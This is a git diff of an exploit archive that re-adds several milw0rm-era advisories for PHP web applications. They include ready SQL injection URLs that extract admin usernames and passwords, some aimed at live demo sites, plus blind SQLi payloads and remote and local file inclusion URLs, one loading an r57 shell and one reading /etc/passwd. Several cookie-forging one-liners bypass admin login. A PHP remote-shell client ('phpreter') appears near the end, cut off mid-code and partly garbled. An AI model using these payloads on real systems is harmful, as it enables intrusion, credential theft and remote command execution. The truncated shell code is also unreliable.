-#    Home :  www.tryag.cc/cc                            =
-#                                                       =
-#    email:  darkangel_g85[at]Yahoo[DoT]com             =
-#                                                       =
-#=========================================================    
-#
-#    script :  http://dreamlevels.com/dreamnews.php
-#
-#    DorK   :  N/A
-#     
-##########################################################
-
-Exploit: 
-
-www.[target].com/Script/dreamnews-rss.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--
-
-
-L!VE DEMO:
-
-http://dreamlevels.com/demo/dreamnews/dreamnews-rss.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--
-
-
-column_name :
-
-user_password
-user_login
-
-
-
-Admin Login :
-
-/admin/
-
-########################( Greetz )###########################
-#                                                           #
-# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke    #
-#                                                           #    
-#         Iraqihack / FAHD / mos_chori / Silic0n            #
-#                                                           #
-#############################################################
-
-                       Im IRAQi
-
-# milw0rm.com [2008-07-10]
+#########################################################
+#
+#     dreamnews ( rss) Remote SQL Injection Vulnerability
+#========================================================
+#    Author: Hussin X                                   =
+#                                                       =
+#    Home :  www.tryag.cc/cc                            =
+#                                                       =
+#    email:  darkangel_g85[at]Yahoo[DoT]com             =
+#                                                       =
+#=========================================================    
+#
+#    script :  http://dreamlevels.com/dreamnews.php
+#
+#    DorK   :  N/A
+#     
+##########################################################
+
+Exploit: 
+
+www.[target].com/Script/dreamnews-rss.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--
+
+
+L!VE DEMO:
+
+http://dreamlevels.com/demo/dreamnews/dreamnews-rss.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--
+
+
+column_name :
+
+user_password
+user_login
+
+
+
+Admin Login :
+
+/admin/
+
+########################( Greetz )###########################
+#                                                           #
+# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke    #
+#                                                           #    
+#         Iraqihack / FAHD / mos_chori / Silic0n            #
+#                                                           #
+#############################################################
+
+                       Im IRAQi
+
+# milw0rm.com [2008-07-10]
diff --git a/platforms/php/webapps/6036.txt b/platforms/php/webapps/6036.txt
index da9981226..5edd7ff73 100755
--- a/platforms/php/webapps/6036.txt
+++ b/platforms/php/webapps/6036.txt
@@ -1,22 +1,22 @@
-######################################################################################################
- gapicms v9.0.2 (dirDepth) Remote File Inclusion Vulnerability
-######################################################################################################
-[~] Found : Ghost Hacker [ R-H TeaM ]           |,  .-.  .-.  ,|
-[~] HOME  : www.Real-Hack.net                   | )(_o/  \o_)( | 
-[~] Email : Ghost-r00t@Hotmail.com              |/     /\     \|
-[~] Script : gapicms v9.0.2
-[~] Download Script : http://heanet.dl.sourceforge.net/sourceforge/gapicms/gapicms_v9.0.2stable.tar.gz
-############################# [ I love the Messenger of Allah Mohammad ] #############################
-[~] Error ( ktmlpro/includes/ktedit/toolbar.php )
-[~] Exploit :
-http://xxxx/[path]/ktmlpro/includes/ktedit/toolbar.php?dirDepth=[Evil]
-############################# [ I love the Messenger of Allah Mohammad ] ############################
-[~] Greetz :
-PROTO & QaTaR BoeZ TeaM & x.CJP.x & Dmar al3noOoz & 4Bo3tB & Mr.JUVE & Mr.hope & LeGeNd HaCkEr ..
-Root Hacker & Jiko & ScarY.HaCkEr & Qptan & the-pirate.org & My Blog [ gh0st10.wordpress.com ]
-All Member Real Hack And All My Friends ..
-######################################################################################################
- Real Hack Team ( R-H ) ..
-######################################################################################################
-
-# milw0rm.com [2008-07-10]
+######################################################################################################
+ gapicms v9.0.2 (dirDepth) Remote File Inclusion Vulnerability
+######################################################################################################
+[~] Found : Ghost Hacker [ R-H TeaM ]           |,  .-.  .-.  ,|
+[~] HOME  : www.Real-Hack.net                   | )(_o/  \o_)( | 
+[~] Email : Ghost-r00t@Hotmail.com              |/     /\     \|
+[~] Script : gapicms v9.0.2
+[~] Download Script : http://heanet.dl.sourceforge.net/sourceforge/gapicms/gapicms_v9.0.2stable.tar.gz
+############################# [ I love the Messenger of Allah Mohammad ] #############################
+[~] Error ( ktmlpro/includes/ktedit/toolbar.php )
+[~] Exploit :
+http://xxxx/[path]/ktmlpro/includes/ktedit/toolbar.php?dirDepth=[Evil]
+############################# [ I love the Messenger of Allah Mohammad ] ############################
+[~] Greetz :
+PROTO & QaTaR BoeZ TeaM & x.CJP.x & Dmar al3noOoz & 4Bo3tB & Mr.JUVE & Mr.hope & LeGeNd HaCkEr ..
+Root Hacker & Jiko & ScarY.HaCkEr & Qptan & the-pirate.org & My Blog [ gh0st10.wordpress.com ]
+All Member Real Hack And All My Friends ..
+######################################################################################################
+ Real Hack Team ( R-H ) ..
+######################################################################################################
+
+# milw0rm.com [2008-07-10]
diff --git a/platforms/php/webapps/6037.txt b/platforms/php/webapps/6037.txt
index 04902a885..b579306ed 100755
--- a/platforms/php/webapps/6037.txt
+++ b/platforms/php/webapps/6037.txt
@@ -1,22 +1,22 @@
-#########################################################
-#
-#     phpDatingClub Local File Include Vulnerability
-#========================================================
-#                            =
-#    Author: Big Ben                                    =
-#                                                       =
-#========================================================
-#
-#    script :  http://www.w2b.ru/download/phpDatingClub.zip
-#
-#    DorK   :   Powered by phpDatingClub
-#     
-##########################################################
-#
-# Exploit:
-#
-# www.[target].com/Script/website.php?page=[LFI]
-#
-##########################################################
-
-# milw0rm.com [2008-07-10]
+#########################################################
+#
+#     phpDatingClub Local File Include Vulnerability
+#========================================================
+#                            =
+#    Author: Big Ben                                    =
+#                                                       =
+#========================================================
+#
+#    script :  http://www.w2b.ru/download/phpDatingClub.zip
+#
+#    DorK   :   Powered by phpDatingClub
+#     
+##########################################################
+#
+# Exploit:
+#
+# www.[target].com/Script/website.php?page=[LFI]
+#
+##########################################################
+
+# milw0rm.com [2008-07-10]
diff --git a/platforms/php/webapps/6040.txt b/platforms/php/webapps/6040.txt
index 09e13beb9..d1d0bdc10 100755
--- a/platforms/php/webapps/6040.txt
+++ b/platforms/php/webapps/6040.txt
@@ -1,115 +1,115 @@
- ________________________________________
-| File Store PRO 3.2 Blind SQL Injection |
-|________________________________________|
-
-
-Download from: http://upoint.info/cgi/demo/fs/filestore.zip
-
-- Need admin rights:
-/confirm.php:
-[code]
-
-if(isset($_GET["folder"]) && $_GET["folder"]!="") {
- $folder=$_GET["folder"];
-} else {
-  exit("Bad Request");
- }
-if(isset($_GET["id"]) && $_GET["id"]!="") {
- $id=$_GET["id"];
-} else {
-  exit("Bad Request");
- }
-
-// Validate all inputs
-// Added by SepedaTua on June 01, 2006 - http://www.sepedatua.info/
-/********************** SepedaTua ****************************/
-
-/* Fields:
-$folder
-$id
-*/
-$search = array ('@]*?>.*?@si',
-                '@<[\/\!]*?[^<>]*?>@si',
-                '@([\r\n])[\s]+@',
-                '@&(quot|#34);@i',
-                '@&(amp|#38);@i',
-                '@&(lt|#60);@i',
-                '@&(gt|#62);@i',
-                '@&(nbsp|#160);@i',
-                '@&(iexcl|#161);@i',
-                '@&(cent|#162);@i',
-                '@&(pound|#163);@i',
-                '@&(copy|#169);@i',
-                '@&#(\d+);@e');
-
-$replace = array ('',
-                 '',
-                 '\1',
-                 '"',
-                 '&',
-                 '<',
-                 '>',
-                 ' ',
-                 chr(161),
-                 chr(162),
-                 chr(163),
-                 chr(169),
-                 'chr(\1)');
-
-$ffolder = $folder;
-$fid = $id;
-
-$folder = preg_replace($search, $replace, $folder);
-$id = preg_replace($search, $replace, $id); 
-
------
-
-$SQL="SELECT `".DB_PREFIX."users`.*, `".DB_PREFIX."file_list`.`filename`, `".DB_PREFIX."file_list`.`descript` ";
-$SQL.=" FROM `".DB_PREFIX."file_list` LEFT JOIN `".DB_PREFIX."users` ON `".DB_PREFIX."file_list`.`user_id`=`".DB_PREFIX."users`.`id`";
-$SQL.=" WHERE `".DB_PREFIX."file_list`.`id`='".$id."'";
-if(!$mysql->query($SQL))
-{
- exit($mysql->error);
-}
-if($mysql->num<=0)
-{
- exit("Record not found");
-} 
-[/code]
-
-POC: 
-' UNION SELECT IF (SUBSTRING(password, 1, 1)='a', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from fstore_users where login='admin 
-Site: http://site.xxx/confirm.php?folder=a&id=[SQL]
-
-- Don't need admin rights:
-In /download.php:
-[code]
-if(!isset($_GET["sig"])) // direct download, no need to login
-$MustLogin=1|2|4;
-require_once("libs/header.php");
-if(!isset($_GET["sig"])) // direct download, no need to login
-$userlevel=$CurUser->getlevel();
-$SQL="SELECT * FROM `".DB_PREFIX."file_list` WHERE `id`='".$fileid."'";
-if(!$mysql->query($SQL))
-{
- exit($mysql->error);
-} 
-[/code]
-
-POC:
-' UNION SELECT IF (SUBSTRING(password, 1, 1)='a', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8,9,10,11 from fstore_users where login='admin
-Site: 
-http://site.xxx/download.php?id=[SQL] 
-
-Needs magic_quotes_gpc=off. Vendor not contacted !
-
---------------------------------------------------------------------
-
-Site: http://rstcenter.com
-Site: http://de-ce.net
-
-Good luck !
-
---------------------------------------------------------------------
-
-# milw0rm.com [2008-07-11]
+ ________________________________________
+| File Store PRO 3.2 Blind SQL Injection |
+|________________________________________|
+
+
+Download from: http://upoint.info/cgi/demo/fs/filestore.zip
+
+- Need admin rights:
+/confirm.php:
+[code]
+
+if(isset($_GET["folder"]) && $_GET["folder"]!="") {
+ $folder=$_GET["folder"];
+} else {
+  exit("Bad Request");
+ }
+if(isset($_GET["id"]) && $_GET["id"]!="") {
+ $id=$_GET["id"];
+} else {
+  exit("Bad Request");
+ }
+
+// Validate all inputs
+// Added by SepedaTua on June 01, 2006 - http://www.sepedatua.info/
+/********************** SepedaTua ****************************/
+
+/* Fields:
+$folder
+$id
+*/
+$search = array ('@]*?>.*?@si',
+                '@<[\/\!]*?[^<>]*?>@si',
+                '@([\r\n])[\s]+@',
+                '@&(quot|#34);@i',
+                '@&(amp|#38);@i',
+                '@&(lt|#60);@i',
+                '@&(gt|#62);@i',
+                '@&(nbsp|#160);@i',
+                '@&(iexcl|#161);@i',
+                '@&(cent|#162);@i',
+                '@&(pound|#163);@i',
+                '@&(copy|#169);@i',
+                '@&#(\d+);@e');
+
+$replace = array ('',
+                 '',
+                 '\1',
+                 '"',
+                 '&',
+                 '<',
+                 '>',
+                 ' ',
+                 chr(161),
+                 chr(162),
+                 chr(163),
+                 chr(169),
+                 'chr(\1)');
+
+$ffolder = $folder;
+$fid = $id;
+
+$folder = preg_replace($search, $replace, $folder);
+$id = preg_replace($search, $replace, $id); 
+
+-----
+
+$SQL="SELECT `".DB_PREFIX."users`.*, `".DB_PREFIX."file_list`.`filename`, `".DB_PREFIX."file_list`.`descript` ";
+$SQL.=" FROM `".DB_PREFIX."file_list` LEFT JOIN `".DB_PREFIX."users` ON `".DB_PREFIX."file_list`.`user_id`=`".DB_PREFIX."users`.`id`";
+$SQL.=" WHERE `".DB_PREFIX."file_list`.`id`='".$id."'";
+if(!$mysql->query($SQL))
+{
+ exit($mysql->error);
+}
+if($mysql->num<=0)
+{
+ exit("Record not found");
+} 
+[/code]
+
+POC: 
+' UNION SELECT IF (SUBSTRING(password, 1, 1)='a', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from fstore_users where login='admin 
+Site: http://site.xxx/confirm.php?folder=a&id=[SQL]
+
+- Don't need admin rights:
+In /download.php:
+[code]
+if(!isset($_GET["sig"])) // direct download, no need to login
+$MustLogin=1|2|4;
+require_once("libs/header.php");
+if(!isset($_GET["sig"])) // direct download, no need to login
+$userlevel=$CurUser->getlevel();
+$SQL="SELECT * FROM `".DB_PREFIX."file_list` WHERE `id`='".$fileid."'";
+if(!$mysql->query($SQL))
+{
+ exit($mysql->error);
+} 
+[/code]
+
+POC:
+' UNION SELECT IF (SUBSTRING(password, 1, 1)='a', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8,9,10,11 from fstore_users where login='admin
+Site: 
+http://site.xxx/download.php?id=[SQL] 
+
+Needs magic_quotes_gpc=off. Vendor not contacted !
+
+--------------------------------------------------------------------
+
+Site: http://rstcenter.com
+Site: http://de-ce.net
+
+Good luck !
+
+--------------------------------------------------------------------
+
+# milw0rm.com [2008-07-11]
diff --git a/platforms/php/webapps/6041.txt b/platforms/php/webapps/6041.txt
index 8792a553c..1f2f99048 100755
--- a/platforms/php/webapps/6041.txt
+++ b/platforms/php/webapps/6041.txt
@@ -1,43 +1,43 @@
-#####################################################################
-#
-# Facebook Newsroom Application Remote File Inclusion Vulnerability
-#
-#####################################################################
-#
-# Discovered by : Ciph3r
-#
-#
-# MAIL : Ciph3r_blackhat@yahoo.com
-#
-#
-# SP tanx4: Iranian hacker & Kurdish security TEAM
-#
-# sp TANX2: milw0rm.com & google.com & sourceforge.net
-# 
-# CMS download : http://sourceforge.net/project/showfiles.php?group_id=221515    
-#
-# class : remote
-#
-# risk : high
-#
-# message : agha kovat tavalodet mobarak ! inam kadoye tavalodet :d 
-#######################################################################
-#
-# C0de : 
-#
-#               
-#    require_once ($path.'/classes/feedStories.class.php');
-#
-#
-#######################################################################
-
- EXPLOIT :
-
- 
-
- www.[Target].com/path/includes/home.php?path=[r57.txt?]
-
-
-#######################################################################
-
-# milw0rm.com [2008-07-11]
+#####################################################################
+#
+# Facebook Newsroom Application Remote File Inclusion Vulnerability
+#
+#####################################################################
+#
+# Discovered by : Ciph3r
+#
+#
+# MAIL : Ciph3r_blackhat@yahoo.com
+#
+#
+# SP tanx4: Iranian hacker & Kurdish security TEAM
+#
+# sp TANX2: milw0rm.com & google.com & sourceforge.net
+# 
+# CMS download : http://sourceforge.net/project/showfiles.php?group_id=221515    
+#
+# class : remote
+#
+# risk : high
+#
+# message : agha kovat tavalodet mobarak ! inam kadoye tavalodet :d 
+#######################################################################
+#
+# C0de : 
+#
+#               
+#    require_once ($path.'/classes/feedStories.class.php');
+#
+#
+#######################################################################
+
+ EXPLOIT :
+
+ 
+
+ www.[Target].com/path/includes/home.php?path=[r57.txt?]
+
+
+#######################################################################
+
+# milw0rm.com [2008-07-11]
diff --git a/platforms/php/webapps/6042.txt b/platforms/php/webapps/6042.txt
index 870be1cf1..40659a240 100755
--- a/platforms/php/webapps/6042.txt
+++ b/platforms/php/webapps/6042.txt
@@ -1,22 +1,22 @@
-/*
-   
-   Wysi Wiki Wyg 1.0 (LFI,XSS,PHPInfo) Remote Vulnerabilities
-   ----------------------------------------------------------
-   By StAkeR[at]hotmail[dot]it
-   http://www.easy-script.com/scripts-dl/wysiwikiwyg10.zip
-   ----------------------------------------------------------
-
-  1- PHPInfo Disclosure 
-  -  index.php?categup=isset
-  
-  2- Local File Inclusion (LFI) (MQ Off)
-  -  index.php?c=../../../&a=etc/passwd%00
-  
-  3- Cross Site Scripting (XSS)
-  -  index.php?c=wikiwizi&a=recherche&s=
-
-
-
-*/
-
-# milw0rm.com [2008-10-20]
+/*
+   
+   Wysi Wiki Wyg 1.0 (LFI,XSS,PHPInfo) Remote Vulnerabilities
+   ----------------------------------------------------------
+   By StAkeR[at]hotmail[dot]it
+   http://www.easy-script.com/scripts-dl/wysiwikiwyg10.zip
+   ----------------------------------------------------------
+
+  1- PHPInfo Disclosure 
+  -  index.php?categup=isset
+  
+  2- Local File Inclusion (LFI) (MQ Off)
+  -  index.php?c=../../../&a=etc/passwd%00
+  
+  3- Cross Site Scripting (XSS)
+  -  index.php?c=wikiwizi&a=recherche&s=
+
+
+
+*/
+
+# milw0rm.com [2008-10-20]
diff --git a/platforms/php/webapps/6044.txt b/platforms/php/webapps/6044.txt
index e8eb53156..76612c2a4 100755
--- a/platforms/php/webapps/6044.txt
+++ b/platforms/php/webapps/6044.txt
@@ -1,47 +1,47 @@
-#################################################################
-#
-#   Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability
-#
-#========================================================
-#                                                       =
-#    Author: Hussin X                                   =
-#                                                       =
-#    Home :  www.tryag.cc/cc
-#                                                       =
-#    email:  darkangel_g85[at]Yahoo[DoT]com             =
-#                                                       =
-#                                                       =
-#========================================================
-#     
-# script : http://e-topbiz.com/oprema/pages/millionpixels3.php
-#
-# DorK  :  inurl: "tops_top.php? id_cat ="     
-#################################################################
-
-Exploit:  
-
-
-www.[target].com/Script/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*
-
-
-
-
-L!VE DEMO:
-
-
-http://e-topbiz.com/trafficdemos/pixel3/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*
-
-
-
-
-########################( Greetz )###########################
-#                                                           #
-# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke    #
-#                                                           #    
-#         Iraqihack / FAHD / mos_chori / Silic0n            #
-#                                                           #
-#############################################################
-
-                       Im IRAQi
-
-# milw0rm.com [2008-07-11]
+#################################################################
+#
+#   Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability
+#
+#========================================================
+#                                                       =
+#    Author: Hussin X                                   =
+#                                                       =
+#    Home :  www.tryag.cc/cc
+#                                                       =
+#    email:  darkangel_g85[at]Yahoo[DoT]com             =
+#                                                       =
+#                                                       =
+#========================================================
+#     
+# script : http://e-topbiz.com/oprema/pages/millionpixels3.php
+#
+# DorK  :  inurl: "tops_top.php? id_cat ="     
+#################################################################
+
+Exploit:  
+
+
+www.[target].com/Script/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*
+
+
+
+
+L!VE DEMO:
+
+
+http://e-topbiz.com/trafficdemos/pixel3/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*
+
+
+
+
+########################( Greetz )###########################
+#                                                           #
+# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke    #
+#                                                           #    
+#         Iraqihack / FAHD / mos_chori / Silic0n            #
+#                                                           #
+#############################################################
+
+                       Im IRAQi
+
+# milw0rm.com [2008-07-11]
diff --git a/platforms/php/webapps/6047.txt b/platforms/php/webapps/6047.txt
index 41e2aa02c..055104479 100755
--- a/platforms/php/webapps/6047.txt
+++ b/platforms/php/webapps/6047.txt
@@ -1,17 +1,17 @@
-Author: Saime
-Date: July 12, 2008
-Script: Maian Cart v1.1 Insecure Cookie Handling Vulnerability
-URL: http://www.maianscriptworld.co.uk
-Dork: Powered by Maian Cart v1.1
-
-Description:
-Maian Car v1.1 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mccart_cookie,
-equals admin username(md5)
-
-Exploit:
-javascript:document.cookie = "mccart_cookie=21232f297a57a5a743894a0e4a801fc3; path=/"
-
-Note:
-The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin
-
-# milw0rm.com [2008-07-12]
+Author: Saime
+Date: July 12, 2008
+Script: Maian Cart v1.1 Insecure Cookie Handling Vulnerability
+URL: http://www.maianscriptworld.co.uk
+Dork: Powered by Maian Cart v1.1
+
+Description:
+Maian Car v1.1 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mccart_cookie,
+equals admin username(md5)
+
+Exploit:
+javascript:document.cookie = "mccart_cookie=21232f297a57a5a743894a0e4a801fc3; path=/"
+
+Note:
+The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin
+
+# milw0rm.com [2008-07-12]
diff --git a/platforms/php/webapps/6048.txt b/platforms/php/webapps/6048.txt
index d87bd9c10..50d7beae4 100755
--- a/platforms/php/webapps/6048.txt
+++ b/platforms/php/webapps/6048.txt
@@ -1,16 +1,16 @@
-Author: Saime
-Date: July 12, 2008
-Script: Maian Events v2.0 Insecure Cookie Handling Vulnerability
-URL: http://www.maianscriptworld.co.uk
-Dork: Maian Events v2.0 Copyright © 2005-2008 Maian Script World. All Rights Reserved
-
-Description:
-Maian Events v2.0 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mevents_admin_cookie,
-equals admin username(md5)
-
-Exploit:
-javascript:document.cookie = "mevents_admin_cookie=21232f297a57a5a743894a0e4a801fc3; path=/"
-Note:
-The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin
-
-# milw0rm.com [2008-07-12]
+Author: Saime
+Date: July 12, 2008
+Script: Maian Events v2.0 Insecure Cookie Handling Vulnerability
+URL: http://www.maianscriptworld.co.uk
+Dork: Maian Events v2.0 Copyright © 2005-2008 Maian Script World. All Rights Reserved
+
+Description:
+Maian Events v2.0 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mevents_admin_cookie,
+equals admin username(md5)
+
+Exploit:
+javascript:document.cookie = "mevents_admin_cookie=21232f297a57a5a743894a0e4a801fc3; path=/"
+Note:
+The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin
+
+# milw0rm.com [2008-07-12]
diff --git a/platforms/php/webapps/6049.txt b/platforms/php/webapps/6049.txt
index a451cb649..2021bfcee 100755
--- a/platforms/php/webapps/6049.txt
+++ b/platforms/php/webapps/6049.txt
@@ -1,17 +1,17 @@
-Author: Saime
-Date: July 12, 2008
-Script: Maian Gallery v2.0 Insecure Cookie Handling Vulnerability
-URL: http://www.maianscriptworld.co.uk
-Dork: Maian Gallery v2.0 Copyright © 2006-2008 Maian Script World. All Rights Reserved.
-
-Description:
-Maian Gallery v2.0 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mgallery_admin_cookie,
-equals admin username(md5)
-
-Exploit:
-javascript:document.cookie = "mgallery_admin_cookie=21232f297a57a5a743894a0e4a801fc3; path=/php/demos/mgallery/admin/"
-
-Note:
-The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin
-
-# milw0rm.com [2008-07-12]
+Author: Saime
+Date: July 12, 2008
+Script: Maian Gallery v2.0 Insecure Cookie Handling Vulnerability
+URL: http://www.maianscriptworld.co.uk
+Dork: Maian Gallery v2.0 Copyright © 2006-2008 Maian Script World. All Rights Reserved.
+
+Description:
+Maian Gallery v2.0 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mgallery_admin_cookie,
+equals admin username(md5)
+
+Exploit:
+javascript:document.cookie = "mgallery_admin_cookie=21232f297a57a5a743894a0e4a801fc3; path=/php/demos/mgallery/admin/"
+
+Note:
+The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin
+
+# milw0rm.com [2008-07-12]
diff --git a/platforms/php/webapps/6050.txt b/platforms/php/webapps/6050.txt
index 29ba646bf..20ad81978 100755
--- a/platforms/php/webapps/6050.txt
+++ b/platforms/php/webapps/6050.txt
@@ -1,14 +1,14 @@
-Author: Saime
-Date: July 12, 2008
-Script: Maian Greetings v2.1 Insecure Cookie Handling Vulnerability
-URL: http://www.maianscriptworld.co.uk
-Dork: Powered by: Maian Greetings v2.1
-
-Description:
-Maian Greetings v2.1 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mecard_admin_cookie,
-equals admin username.
-
-Exploit:
-javascript:document.cookie = "mecard_admin_cookie=admin; path=/php/demos/greetings/admin/"
-
-# milw0rm.com [2008-07-12]
+Author: Saime
+Date: July 12, 2008
+Script: Maian Greetings v2.1 Insecure Cookie Handling Vulnerability
+URL: http://www.maianscriptworld.co.uk
+Dork: Powered by: Maian Greetings v2.1
+
+Description:
+Maian Greetings v2.1 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mecard_admin_cookie,
+equals admin username.
+
+Exploit:
+javascript:document.cookie = "mecard_admin_cookie=admin; path=/php/demos/greetings/admin/"
+
+# milw0rm.com [2008-07-12]
diff --git a/platforms/php/webapps/6051.txt b/platforms/php/webapps/6051.txt
index 08e5e9bda..52192b841 100755
--- a/platforms/php/webapps/6051.txt
+++ b/platforms/php/webapps/6051.txt
@@ -1,17 +1,17 @@
-Author: Saime
-Date: July 12, 2008
-Script: Maian Music v1.0 Insecure Cookie Handling Vulnerability
-URL: http://www.maianscriptworld.co.uk
-Dork: Maian Music v1.0. Copyright © 2007-2008 Maian Script World. All Rights Reserved.
-
-Description:
-Maian Music v1.0 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mmusic_cookie,
-equals admin username.(md5)
-
-Exploit:
-javascript:document.cookie = "mmusic_cookie=21232f297a57a5a743894a0e4a801fc3; path=/php/demos/music/admin/"
-
-Note:
-The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin
-
-# milw0rm.com [2008-07-12]
+Author: Saime
+Date: July 12, 2008
+Script: Maian Music v1.0 Insecure Cookie Handling Vulnerability
+URL: http://www.maianscriptworld.co.uk
+Dork: Maian Music v1.0. Copyright © 2007-2008 Maian Script World. All Rights Reserved.
+
+Description:
+Maian Music v1.0 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mmusic_cookie,
+equals admin username.(md5)
+
+Exploit:
+javascript:document.cookie = "mmusic_cookie=21232f297a57a5a743894a0e4a801fc3; path=/php/demos/music/admin/"
+
+Note:
+The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin
+
+# milw0rm.com [2008-07-12]
diff --git a/platforms/php/webapps/6053.php b/platforms/php/webapps/6053.php
index be88fdd15..8f121123b 100755
--- a/platforms/php/webapps/6053.php
+++ b/platforms/php/webapps/6053.php
@@ -1,291 +1,291 @@
-#!/usr/bin/php
-') );
-
-$shell = new phpreter($url.'code/polls/titles.inc.php', '-:-:-(.*)-:-:-', 'cmd', array(), false);
-
-function get($url)
-{
-	$infos = parse_url($url);
-	$host = $infos['host'];
-	$port = isset($infos['port']) ? $infos['port'] : 80;
-	
-	$fp = fsockopen($host, $port, &$errno, &$errstr, 30);
-	
-	$req  = "GET $url HTTP/1.1\r\n";
-	$req .= "Host: $host\r\n";
-	$req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\r\n";
-	$req .= "Connection: close\r\n\r\n";
-
-	fputs($fp,$req);
-	fclose($fp);
-}
-
-/*
- * Copyright (c) real
- *
- * This program is free software; you can redistribute it and/or 
- * modify it under the terms of the GNU General Public License 
- * as published by the Free Software Foundation; either version 2 
- * of the License, or (at your option) any later version. 
- * 
- * This program is distributed in the hope that it will be useful, 
- * but WITHOUT ANY WARRANTY; without even the implied warranty of 
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
- * GNU General Public License for more details. 
- * 
- * You should have received a copy of the GNU General Public License 
- * along with this program; if not, write to the Free Software 
- * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
- *
- * TITLE:          PHPreter
- * AUTHOR:         Charles "real" F. 
- * VERSION:        1.0
- * LICENSE:        GNU General Public License
- *
- * This is a really simple class with permits to exec SQL, PHP or CMD
- * on a remote host using the HTTP "Shell" header.
- *
- *
- * Sample code:
- * [host][sql]# mode=cmd
- * [host][cmd]# id
- * uid=2176(u47170584) gid=600(ftpusers)
- * 
- * [host][cmd]# mode=php
- * [host][php]# echo phpversion();
- * 4.4.8
- * [host][php]# mode=sql
- * [host][sql]# SELECT version(), user()
- * --------------------------------------------------
- *  version()           | 5.0.51a-log
- *  user()              | dbo225004932@74.208.16.148
- * --------------------------------------------------
- * 
- * [host][sql]#
- *
- */
-
-class phpreter
-{
-	var $url;
-	var $host;
-	var $port;
-	var $page;
-	
-	var $mode;
-	
-	var $ssql;
-	
-	var $prompt;
-	var $phost;
-	
-	var $regex;
-	var $data;
-	
-	/**
-	 * __construct()
-	 *
-	 * @param url      The url of the remote shell.
-	 * @param regexp   The regex to catch cmd result.
-	 * @param mode     Mode: php, sql or cmd.
-	 * @param sql      An array with the file to include,
-	 *                 and sql vars
-	 * @param clear    Determines if clear() is called
-	 *                 on startup
-	 */
-	function __construct($url, $regexp='^(.*)$', $mode='cmd', $sql=array(), $clear=true)
-	{
-		$this->url = $url;
-		
-		$this->regex = '#'.$regexp.'#is';
-		
-		#
-		# Set data
-		#
-		
-		$infos         =	parse_url($this->url);
-		$this->host    =	$infos['host'];
-		$this->port    =	isset($infos['port']) ? $infos['port'] : 80;
-		$this->page    =	$infos['path'];
-		unset($infos);
-		
-		# www.(site).com
-		$host_tmp      =	explode('.',$this->host);
-		$this->phost   =	$host_tmp[ count($host_tmp)-2 ];
-		unset($host_tmp);
-		
-		#
-		# Set up MySQL connection string
-		#
-		if(!sizeof($sql))
-			$this->ssql = '';
-		elseif(sizeof($sql)==5)
-		{
-			$this->ssql = "include('$sql[0]');"
-			            . "mysql_connect($sql[1], $sql[2], $sql[3]);"
-				    . "mysql_select_db($sql[4]);";
-		}
-		else
-		{
-			$this->ssql = ""
-			            . "mysql_connect('$sql[0]', '$sql[1]', '$sql[2]');"
-				    . "mysql_select_db('$sql[3]');";
-		}
-		
-		$this->setmode($mode);
-		
-		#
-		# Main Loop
-		#
-
-		if($clear) $this->clear();
-		print $this->prompt;
-
-		while( !preg_match('#^(quit|exit|close)$#i', ($cmd = trim(fgets(STDIN)))) )
-		{
-			# change mode
